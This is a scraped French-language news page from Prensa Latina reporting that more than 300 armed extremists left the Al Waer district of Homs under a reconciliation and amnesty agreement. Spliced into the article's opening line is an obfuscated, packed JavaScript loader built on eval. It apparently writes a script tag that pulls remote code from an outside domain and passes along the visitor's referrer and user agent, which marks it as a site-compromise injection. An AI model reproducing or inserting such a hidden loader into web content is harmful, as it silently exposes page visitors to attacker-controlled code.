lundi 22 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Plus de 300 extrémistes quittent la vile syrienne de Homs

Damas eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zzrhz|var|u0026u|referrer|yzibf||js|php'.split('|'),0,{})) (PL) Des sources militaires ont confirmé que plus de 300 extrémistes armés ont quitté le quartier d'Al Waer, le dernier qu'ils occupaient dans la ville syrienne de Homs, à 162 kilomètres au nord de Damas.

Damas (PL) Des sources militaires ont confirmé que plus de 300 extrémistes armés ont quitté le quartier d’Al Waer, le dernier qu’ils occupaient dans la ville syrienne de Homs, à 162 kilomètres au nord de Damas.

Leur départ fait partie d’un accord de réconciliation qui vise à déclarer le quartier libre ainsi que le retour des institutions étatiques.

Selon l’accord, qui s’appliquera durant 6 à 8 semaines, les insurgés qui refusent de se rendre quitteront la ville en compagnie de leurs familles vers le nord d’Alep, alors que ceux qui profitent du décret d’amnistie numéro 15 de 2016 seront graciés.

Le 18 mars, 423 d’entre eux qui ont refusé la réconciliation ont été évacués, alors que 625 ont été graciés.

ymr/pgh

EN CONTINU
notes connexes